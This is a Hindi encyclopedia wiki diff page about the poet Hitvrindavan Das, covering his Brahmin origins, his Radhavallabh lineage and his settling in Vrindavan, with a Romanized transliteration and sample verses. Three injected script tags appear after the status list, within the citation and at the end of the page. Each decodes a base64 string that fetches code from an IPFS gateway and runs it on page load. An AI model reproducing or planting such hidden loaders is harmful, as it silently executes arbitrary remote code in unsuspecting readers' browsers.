Difference between revisions of "हितवृंदावन दास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "संगृहीत" to "संग्रहीत")
 
Line 1: Line 1:
 
हितवृंदावन दास [[पुष्कर]] क्षेत्र के रहने वाले गौड़ [[ब्राह्मण]] थे और [[संवत्]] 1765 में उत्पन्न हुए थे। ये [[राधावल्लभ सम्प्रदाय|राधाबल्लभीय]] गोस्वामी हितरूपजी के शिष्य थे। तत्कालीन गोसाईं जी के पिता के गुरु भ्राता होने के कारण गोसाईं जी की देखा देखी सब लोग इन्हें 'चाचाजी' कहने लगे। ये 'महाराज नागरीदास' जी के भाई बहारदुरसिंह जी के आश्रय में रहते थे, पर जब राजकुल में विग्रह उत्पन्न हुआ तब ये 'कृष्णगढ़' छोड़कर [[वृंदावन]] चले आए और अंत समय तक वहीं रहे।  
 
हितवृंदावन दास [[पुष्कर]] क्षेत्र के रहने वाले गौड़ [[ब्राह्मण]] थे और [[संवत्]] 1765 में उत्पन्न हुए थे। ये [[राधावल्लभ सम्प्रदाय|राधाबल्लभीय]] गोस्वामी हितरूपजी के शिष्य थे। तत्कालीन गोसाईं जी के पिता के गुरु भ्राता होने के कारण गोसाईं जी की देखा देखी सब लोग इन्हें 'चाचाजी' कहने लगे। ये 'महाराज नागरीदास' जी के भाई बहारदुरसिंह जी के आश्रय में रहते थे, पर जब राजकुल में विग्रह उत्पन्न हुआ तब ये 'कृष्णगढ़' छोड़कर [[वृंदावन]] चले आए और अंत समय तक वहीं रहे।  
 
;समय
 
;समय
संवत् 1800 से लेकर संवत् 1844 तक की इनकी रचनाओं का पता लगता है। जैसे [[सूरदास]] के सवा लाख पद बनाने की जनश्रुति है, वैसे ही इनके भी एक लाख पद और [[छंद]] बनाने की बात प्रसिद्ध है। इनमें से 20,000 के लगभग पद्य तो इनके मिले हैं। इन्होंने नखशिख, अष्टयाम, समयप्रबंध, छद्मलीला आदि असंख्य प्रसंगों का विशद वर्णन किया है। छद्मलीलाओं का वर्णन तो बड़ा ही अनूठा है। इनके ग्रंथ प्रकाशित नहीं हुए हैं। रागरत्नाकर आदि ग्रंथों में इनके बहुत से पद संगृहीत मिलते हैं। छत्रपुर के राजपुस्तकालय में इनकी बहुत सी रचनाएँ सुरक्षित हैं।
+
संवत् 1800 से लेकर संवत् 1844 तक की इनकी रचनाओं का पता लगता है। जैसे [[सूरदास]] के सवा लाख पद बनाने की जनश्रुति है, वैसे ही इनके भी एक लाख पद और [[छंद]] बनाने की बात प्रसिद्ध है। इनमें से 20,000 के लगभग पद्य तो इनके मिले हैं। इन्होंने नखशिख, अष्टयाम, समयप्रबंध, छद्मलीला आदि असंख्य प्रसंगों का विशद वर्णन किया है। छद्मलीलाओं का वर्णन तो बड़ा ही अनूठा है। इनके ग्रंथ प्रकाशित नहीं हुए हैं। रागरत्नाकर आदि ग्रंथों में इनके बहुत से पद संग्रहीत मिलते हैं। छत्रपुर के राजपुस्तकालय में इनकी बहुत सी रचनाएँ सुरक्षित हैं।
 
इतने अधिक परिमाण में होने पर भी इनकी रचना शिथिल या भरती की नहीं है। भाषा पर इनका पूरा अधिकार प्रकट होता है। लीलाओं के अंतर्गत वचन और व्यापार की योजना भी इनकी कल्पना की स्फूर्ति का परिचय देती है -
 
इतने अधिक परिमाण में होने पर भी इनकी रचना शिथिल या भरती की नहीं है। भाषा पर इनका पूरा अधिकार प्रकट होता है। लीलाओं के अंतर्गत वचन और व्यापार की योजना भी इनकी कल्पना की स्फूर्ति का परिचय देती है -
  

Latest revision as of 08:24, 21 May 2017

hitavriandavan das pushkar kshetr ke rahane vale gau d brahman the aur sanvath 1765 mean utpann hue the. ye radhaballabhiy gosvami hitaroopaji ke shishy the. tatkalin gosaeean ji ke pita ke guru bhrata hone ke karan gosaeean ji ki dekha dekhi sab log inhean 'chachaji' kahane lage. ye 'maharaj nagaridas' ji ke bhaee baharadurasianh ji ke ashray mean rahate the, par jab rajakul mean vigrah utpann hua tab ye 'krishnagadh' chho dakar vriandavan chale ae aur aant samay tak vahian rahe.

samay

sanvath 1800 se lekar sanvath 1844 tak ki inaki rachanaoan ka pata lagata hai. jaise sooradas ke sava lakh pad banane ki janashruti hai, vaise hi inake bhi ek lakh pad aur chhand banane ki bat prasiddh hai. inamean se 20,000 ke lagabhag pady to inake mile haian. inhoanne nakhashikh, ashtayam, samayaprabandh, chhadmalila adi asankhy prasangoan ka vishad varnan kiya hai. chhadmalilaoan ka varnan to b da hi anootha hai. inake granth prakashit nahian hue haian. ragaratnakar adi granthoan mean inake bahut se pad sangrahit milate haian. chhatrapur ke rajapustakalay mean inaki bahut si rachanaean surakshit haian. itane adhik pariman mean hone par bhi inaki rachana shithil ya bharati ki nahian hai. bhasha par inaka poora adhikar prakat hota hai. lilaoan ke aantargat vachan aur vyapar ki yojana bhi inaki kalpana ki sphoorti ka parichay deti hai -

mithabolani naval manihari.
bhauanhean gol garoor haian, yake nayan chutile bhari.
choori lakhi mukh tean kahai, ghooanghat mean musakati.
sasi manu badari ot tean duri darasat yahi bhaanti.
chooro b do hai mol ko, nagar n gahak koy.
mo pheri khali pari, aee sab ghar toy

pritam tum mo drigan basat ho.
kaha bharose hvai poochhat hau, kai chaturaee kari ju hansat hau
lijai parakhi svaroop apano, putarin mean tumahian tau lasatahau.
vriandavan hit roop rasik tum, kuanj l davat hiy hulasatahau [1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. manihari lila se

achary, ramachandr shukl “prakaran 3”, hindi sahity ka itihas (hindi). bharatadiskavari pustakalay: kamal prakashan, nee dilli, prishth san. 245.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>